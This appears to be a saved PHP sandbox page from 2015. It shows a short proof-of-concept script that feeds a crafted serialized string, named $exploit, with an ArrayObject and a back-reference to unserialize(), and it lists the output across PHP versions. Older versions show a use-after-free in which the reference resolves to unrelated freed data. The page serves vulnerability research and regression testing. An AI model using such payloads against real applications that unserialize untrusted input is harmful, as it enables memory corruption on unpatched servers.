@ 2015-10-02T11:22:23Z <?php
class obj implements Serializable {
var $data;
function serialize() {
return serialize($this->data);
}
function unserialize($data) {
$this->data = unserialize($data);
}
}
$inner = 'x:i:1234;a:0:{};m:a:0:{}';
$exploit = 'a:2:{i:0;C:11:"ArrayObject":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
$v[$i] = 'hi'.$i;
}
var_dump($data);
Enable javascript to submit You have javascript disabled. You will not be able to edit any code.
Output for 8.1.0 - 8.1.28 , 8.2.0 - 8.2.19 , 8.3.0 - 8.3.7 Deprecated: obj implements the Serializable interface, which is deprecated. Implement __serialize() and __unserialize() instead (or in addition, if support for old PHP versions is necessary) in /in/cW23S on line 3
array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
int(1234)
}
Output for 5.4.44 - 5.4.45 , 5.5.28 - 5.5.35 , 5.6.12 - 5.6.28 , 7.0.0 - 7.0.20 , 7.1.0 - 7.1.20 , 7.2.0 - 7.2.33 , 7.3.16 - 7.3.33 , 7.4.0 - 7.4.33 , 8.0.0 - 8.0.30 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
int(1234)
}
Output for 5.4.2 - 5.4.43 , 5.5.24 - 5.5.27 , 5.6.7 - 5.6.11 array(2) {
[0]=>
object(ArrayObject)#1 (1) {
["storage":"ArrayObject":private]=>
array(0) {
}
}
[1]=>
string(3) "hi3"
}
preferences:dark mode live preview
171.95 ms | 402 KiB | 229 Q